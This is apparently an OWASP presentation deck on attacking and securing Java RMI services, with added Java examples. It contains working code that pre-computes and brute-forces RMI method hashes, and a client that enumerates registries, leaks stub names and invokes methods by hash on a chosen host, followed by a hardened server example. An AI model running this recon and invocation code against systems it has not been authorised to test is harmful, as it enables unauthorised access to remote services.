Security Assessing Java RMI
OWASP
Adam Boulton
OWASP Contributor
Corsaire
Adam.Boulton@corsaire.com
+44 1483 746700
24th Sept 2008
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
Profile
Principal Security Consultant at Corsaire
Anti-Virus Analyst for Sophos Plc
Ministry of Defence (Level 1 Security Clearance)
BSc 1st Class (Hons) Software Engineering
Big Java Fan – check out OWASP Java Gotchas!
Agenda
What is Remote Method Invocation (RMI)?
RMI Architecture
Attacking an RMI service with RMI Spy
Securing RMI services
What is RMI?
Distributed computing solution
All about remote objects
Part of core JDK platform since 1.1
java.rmi package
Not familiar? Think….
Microsoft .NET Remoting
RPC
CORBA
What is RMI?
Communicating between 2 JVMs over a network
Export functionality at the object level
Remote clients deal with objects as if they were local
RMI uses object serialization
Your custom classes must implement the Serializable
interface so they can be passed by value (objects that are themselves Remote are passed by reference, as stubs)
Primitives are just sent by value
What is RMI?
Transparent solution
All underlying network functionality is hidden from the developer
RMI Specification states:
 “Make writing reliable distributed applications as simple as
possible”
Increases the risk that services are implemented
insecurely
 Security through obscurity
RMI Architecture
Client (Interface) holds an Object (the stub)
Server (Implementation) holds an Object (the exported implementation, behind a skeleton)
Calls between the two travel over JRMP (Java Remote Method Protocol) on top of TCP/IP
RMI Registry
Used for looking up Objects
Servers register their Objects
Clients use to find and obtain remote references
Runs on port 1099 by default
RMI tools
rmic (rmic.exe on Windows)
Special compiler that creates the stub (and, for the 1.1 protocol, skeleton) classes
Registry
Created by:
 rmiregistry <port no> (rmiregistry.exe on Windows)
– Or
 LocateRegistry.createRegistry(int portNo)
The Interface / Method Hash
64-bit hash derived from SHA-1: the first 8 bytes of the digest, read little-endian, form a signed long
Method name + method descriptor (JVM descriptor format) are the
message, written as a UTF string with its 2-byte length prefix
Example:
void myRemoteMethod(int i, Object o, boolean b)
 myRemoteMethod(ILjava/lang/Object;Z)V
– 0xB7B6B5B4B3B2B1B0 (illustrative value on the slide, not the real digest)
Hash weakness
An attacker can pre-calculate hashes if they
know (or can guess) API details: the hash is a deterministic function of the method name and descriptor, with no secret input
64-bit
Brute-force over plausible names and prototypes
Rainbow tables
Due to the implementation it doesn’t even
appear to actually be 64 bits!
Still doing the analysis
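The following is an added example, not code from the deck or from RMI Spy. It recomputes the JRMP 1.2 method hash the way the JDK's own stubs do (SHA-1 over the writeUTF encoding of name plus JVM descriptor, first eight digest bytes packed little-endian into a signed long) and then uses it for the pre-calculation described on this slide and in Step 3 of the methodology: a table of hashes for a candidate interface, and a wordlist brute force for one guessed prototype. The wordlist and the getBalance signature are constructed for the demonstration.

```java
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.lang.reflect.Method;
import java.security.DigestOutputStream;
import java.security.MessageDigest;
import java.util.LinkedHashMap;
import java.util.Map;

/** Added example: recomputes JRMP 1.2 method hashes so they can be pre-calculated. */
public class RmiMethodHash {

    // JVM type descriptor: int -> I, boolean -> Z, Object -> Ljava/lang/Object;, String[] -> [Ljava/lang/String;
    static String descriptor(Class<?> c) {
        if (c == void.class) return "V";
        if (c == boolean.class) return "Z";
        if (c == byte.class) return "B";
        if (c == char.class) return "C";
        if (c == short.class) return "S";
        if (c == int.class) return "I";
        if (c == long.class) return "J";
        if (c == float.class) return "F";
        if (c == double.class) return "D";
        if (c.isArray()) return "[" + descriptor(c.getComponentType());
        return "L" + c.getName().replace('.', '/') + ";";
    }

    // "name(paramDescriptors)returnDescriptor", e.g. myRemoteMethod(ILjava/lang/Object;Z)V
    static String nameAndDescriptor(String name, Class<?>[] params, Class<?> returnType) {
        StringBuilder sb = new StringBuilder(name).append('(');
        for (Class<?> p : params) sb.append(descriptor(p));
        return sb.append(')').append(descriptor(returnType)).toString();
    }

    // SHA-1 over the DataOutputStream.writeUTF encoding of the string (the 2-byte
    // length prefix is digested too); the first 8 digest bytes are packed
    // little-endian into a signed long. This is the value sent on every 1.2 call.
    static long hash(String nameAndDescriptor) throws Exception {
        MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
        DataOutputStream out = new DataOutputStream(
                new DigestOutputStream(new ByteArrayOutputStream(), sha1));
        out.writeUTF(nameAndDescriptor);
        out.flush();
        byte[] digest = sha1.digest();
        long h = 0;
        for (int i = 0; i < 8; i++) {
            h += ((long) (digest[i] & 0xFF)) << (i * 8);
        }
        return h;
    }

    static long hash(Method m) throws Exception {
        return hash(nameAndDescriptor(m.getName(), m.getParameterTypes(), m.getReturnType()));
    }

    // Pre-computation (Step 3): hash every method of a candidate interface so a
    // hash seen on the wire can be matched by table lookup.
    static Map<Long, String> precompute(Class<?> candidateInterface) throws Exception {
        Map<Long, String> table = new LinkedHashMap<>();
        for (Method m : candidateInterface.getMethods()) {
            table.put(hash(m), nameAndDescriptor(m.getName(), m.getParameterTypes(), m.getReturnType()));
        }
        return table;
    }

    // Brute force over a name wordlist for one fixed prototype; the descriptor part
    // of the message is so structured that only the name really needs guessing.
    static String crack(long target, String[] names, Class<?>[] params, Class<?> returnType) throws Exception {
        for (String name : names) {
            String sig = nameAndDescriptor(name, params, returnType);
            if (hash(sig) == target) return sig;
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        String sig = "myRemoteMethod(ILjava/lang/Object;Z)V";   // the deck's example signature
        System.out.printf("%s -> 0x%016X (%d)%n", sig, hash(sig), hash(sig));

        // java.rmi.registry.Registry is a public remote interface, so its per-method
        // hashes are known to anyone; print them as a worked table.
        for (Map.Entry<Long, String> e : precompute(java.rmi.registry.Registry.class).entrySet()) {
            System.out.printf("%20d  %s%n", e.getKey(), e.getValue());
        }

        // Recover a name from a hash given a guessed prototype and a small wordlist (constructed).
        long target = hash("getBalance(Ljava/lang/String;)Ljava/lang/Object;");
        String[] wordlist = {"login", "getUser", "getBalance", "transfer"};
        System.out.println("cracked: " + crack(target, wordlist, new Class<?>[]{String.class}, Object.class));
    }
}
```

Run with `javac RmiMethodHash.java && java RmiMethodHash`. Because the input is deterministic and contains no secret, the only defence the 64-bit size offers is against guessing a method whose name and prototype are both unknown; any name that appears in a client, a JAR, or a wordlist is one hash away.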
RMI server secrets...
An attacker’s shopping list:
Bound object names
Stub name
The static signed 64-bit key(s), i.e. the method hash(es)
Method prototypes (interface)
The ability to code a client!
Today’s RMI service...
Only hosting 3 methods
Let’s attack it.... LIVE!
Methodology for a 0-day RMI assessment
Step 1 – Enumerate bound object names
Step 2 – Determine stub name
Step 3 – Enumerate method hashes
Step 4 – Determine method prototypes
Step 5 – Create stub
Step 1 – Enumerate bound objects
Use your own scanning tools to detect an RMI
service (the registry listens on TCP 1099 by default)
Identify objects which are bound to the registry that
we can talk to
Easily done using the java.rmi package (Registry.list())
Step 2 – Determine stub name
The correct stub name is required so we can talk to
the RMI service: lookup() returns a serialized stub, and the client JVM can only deserialize it if a class of that exact name is on its classpath
Use RMISpyStubName to establish the correct
stub name
Rename the template to that name
Step 3 – Enumerate key / method hashes
The hashes are calculated from the method
name and descriptor
The signed 64-bit value
Remember, only 1 hash for v1.1 (the interface hash, plus an operation number per method; the 1.2 protocol carries one hash per method)
Add the hash to the template
Hashes can be pre-calculated
Step 4 – Determine method prototypes
First establish the parameter types
Bit more manual work: mismatched types usually surface as unmarshalling errors from the server
Secondly, establish the return type
Object is our friend (declare the return type as Object and inspect whatever comes back)
Method names are irrelevant
All about the 64-bit signed value
Step 5 – Creating the stub
Detail has been added at each stage; we now
have enough for a fully working custom client!
The service is now ready to fingerprint in more
detail.
By using the business logic layer we can
determine LOTS more detail.
Can rely on the developer getting it wrong to
establish more detail.
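The five steps above as one added example, written here for this page and not taken from RMI Spy or the deck. It assumes a registry at a host and port you are authorised to test, takes a candidate hash as a hex argument (captured from the wire or pre-computed), and uses a local Probe interface whose method names are meaningless: only its parameter and return types matter, because java.rmi.server.RemoteRef.invoke uses the Method purely to marshal arguments and unmarshal the result while the hash goes on the wire.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.UnmarshalException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RemoteObject;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.RemoteRef;

/** Added example: the deck's five-step assessment against an assumed target. */
public class RmiRecon {

    // Step 1: the registry lists its bound names to anyone who asks.
    static String[] enumerateBoundNames(Registry registry) throws Exception {
        return registry.list();
    }

    // Step 2: lookup() makes this JVM deserialise the stub. If the stub class
    // (rmic *_Stub) or the remote interface (dynamic proxy) is missing here, the
    // UnmarshalException wraps a ClassNotFoundException naming exactly the class
    // to supply: the "template" becomes a class of that name extending
    // java.rmi.server.RemoteStub (rmic stubs declare serialVersionUID = 2), or an
    // interface of that name extending Remote for proxy-based stubs.
    static Remote lookupOrLeakStubName(Registry registry, String name) throws Exception {
        try {
            return registry.lookup(name);
        } catch (UnmarshalException e) {
            if (e.detail instanceof ClassNotFoundException) {
                System.out.println("  " + name + " needs class on client: " + e.detail.getMessage());
                return null;
            }
            throw e;
        }
    }

    // Step 4 prototypes (assumed shapes). Object as the return type accepts
    // whatever serialisable value the server sends back.
    interface Probe extends Remote {
        Object noArgs() throws Exception;
        Object oneString(String s) throws Exception;
        Object intObjBool(int i, Object o, boolean b) throws Exception;
    }

    // Steps 3 and 5: pull the RemoteRef out of the stub and invoke by hash. A JDK
    // server answers an unknown hash with an UnmarshalException ("unrecognized
    // method hash: method not supported by remote object") and a wrong prototype
    // usually with "error unmarshalling arguments", so each reply refines the guess.
    static Object invokeByHash(Remote stub, Method shape, Object[] args, long hash) throws Exception {
        RemoteRef ref;
        if (stub instanceof RemoteObject) {          // rmic-generated *_Stub
            ref = ((RemoteObject) stub).getRef();
        } else {                                     // dynamic proxy (Java 5 and later)
            ref = ((RemoteObjectInvocationHandler) Proxy.getInvocationHandler(stub)).getRef();
        }
        return ref.invoke(stub, shape, args, hash);
    }

    public static void main(String[] argv) throws Exception {
        String host = argv.length > 0 ? argv[0] : "127.0.0.1";            // assumed target
        int port = argv.length > 1 ? Integer.parseInt(argv[1]) : 1099;
        // Candidate hash as 16 hex digits, e.g. captured off the wire or pre-computed.
        long hash = argv.length > 2 ? Long.parseUnsignedLong(argv[2], 16) : 0L;

        Registry registry = LocateRegistry.getRegistry(host, port);
        for (String name : enumerateBoundNames(registry)) {
            System.out.println("bound: " + name);
            Remote stub = lookupOrLeakStubName(registry, name);
            if (stub == null) continue;
            System.out.println("  stub class: " + stub.getClass().getName());

            Method shape = Probe.class.getMethod("intObjBool", int.class, Object.class, boolean.class);
            try {
                Object result = invokeByHash(stub, shape, new Object[]{1, "probe", true}, hash);
                System.out.println("  server returned: " + result);
            } catch (Exception e) {
                System.out.println("  server said: " + e);
            }
        }
    }
}
```

Run as `java RmiRecon <host> <port> <hash-hex>` with the leaked stub or interface class on the classpath. Nothing in this client is authenticated by the server: the bound names, the stub class name and the server's own error messages supply every piece the deck lists on the attacker's shopping list.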
Why is RMI insecure?
Building on an insecure foundation
Skeleton implementation is flawed
False sense of security
Security through obscurity
Keys are insufficient: the hashes are derived from public information, not from a secret, so they are not an access control
Chances are you won’t notice an attacker until a
correct client has been constructed
Securing an RMI Server
Adapt the RMI server code
Stop information leakage
 Sun should have read the OWASP top 10!
Modify the method hashes
Java Authentication and Authorization Service (JAAS)
Be careful what you expose!
Just because you don’t release a client with the
functionality doesn’t mean attackers can’t see it!
Don’t expose the server object directly (export a facade that contains only the methods meant to be remote)
Don’t rely on security through obscurity
Securing an RMI Server (Cont...)
Logging
Invoke from command line:
 java -Djava.rmi.server.logCalls=true YourServerImp
Or enable inside program
 RemoteServer.setLog(System.err);
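An added example of the hardening points on these two slides, written for this page rather than taken from the deck: only a facade is exported, so the internal service object and its extra methods are never reachable by hash; every remote call is authorised before it touches business logic and fails with one generic error rather than leaking detail; call logging is switched on with RemoteServer.setLog; and both the registry and the exported object are bound to a single address through a server socket factory. The shared-secret token stands in for whatever authentication and authorisation decision the service makes (the deck suggests JAAS); the AccountService, the account format and the bound name are assumptions.

```java
import java.net.InetAddress;
import java.net.ServerSocket;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.RemoteServer;
import java.rmi.server.ServerNotActiveException;
import java.rmi.server.UnicastRemoteObject;

/** Added example: an RMI server that exposes a facade, authorises, logs and binds narrowly. */
public class HardenedRmiServer {

    // Internal service (assumed). It is never exported, so none of its methods
    // has a hash an attacker could call.
    static class AccountService {
        String balance(String account) { return "balance of " + account; }
        void deleteEverything() { /* must never be remotely reachable */ }
    }

    // The only remote interface: this is the whole attack surface by design.
    public interface AccountFacade extends Remote {
        String balance(String token, String account) throws RemoteException;
    }

    static class AccountFacadeImpl implements AccountFacade {
        private final AccountService backend = new AccountService();
        private final String sharedSecret;   // stand-in for a JAAS login / authorisation check

        AccountFacadeImpl(String sharedSecret) { this.sharedSecret = sharedSecret; }

        public String balance(String token, String account) throws RemoteException {
            String caller;
            try {
                caller = RemoteServer.getClientHost();
            } catch (ServerNotActiveException e) {
                caller = "?";
            }
            if (!sharedSecret.equals(token)) {
                System.err.println("denied balance() from " + caller);
                throw new RemoteException("not authorised");   // one generic error: nothing to fingerprint
            }
            if (!account.matches("[A-Z0-9]{1,12}")) {          // validate before the business layer sees it
                throw new RemoteException("bad request");
            }
            return backend.balance(account);
        }
    }

    // Listen on one address only (loopback here) instead of every interface.
    static RMIServerSocketFactory boundTo(InetAddress addr) {
        return port -> new ServerSocket(port, 50, addr);
    }

    public static void main(String[] args) throws Exception {
        InetAddress bind = InetAddress.getLoopbackAddress();
        RMIServerSocketFactory ssf = boundTo(bind);

        RemoteServer.setLog(System.err);   // same effect as -Djava.rmi.server.logCalls=true

        Registry registry = LocateRegistry.createRegistry(1099, null, ssf);
        AccountFacade facade = new AccountFacadeImpl(args.length > 0 ? args[0] : "change-me");
        AccountFacade stub = (AccountFacade) UnicastRemoteObject.exportObject(facade, 0, null, ssf);
        registry.rebind("accounts", stub);
        System.err.println("accounts bound on " + bind.getHostAddress() + ":1099");
        Thread.currentThread().join();
    }
}
```

With this layout an attacker who enumerates the registry, obtains the facade's interface name and pre-computes its hashes still reaches only balance(), and every probe is logged with the calling host. The obscurity of hash values plays no part in the security of the service.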
Further Developments of RMI Spy
Fully automated
Integrating the 5 stages into a click and run
GUI
Automated interface and stub creation
Packet Sniffer
RMI Call parser
 Pull keys from the wire
 Pull objects from the wire and assess
 Modify objects on the fly
Further Developments of RMI Spy (cont...)
Code tidy!
Hash generator
Dynamic Invocation
Fuzzing
Exception handler (what is the server telling us)
Multi-threading
Hash attack (possible C++ and packet)
Summary
RMI Architecture
Why RMI is insecure
Comment in the generated code says “do not edit”.
We all know differently now.
Security is difficult; even Sun don’t always get it right!
RMI Spy
Only tool in (known) existence to attack RMI services
How to secure RMI
Questions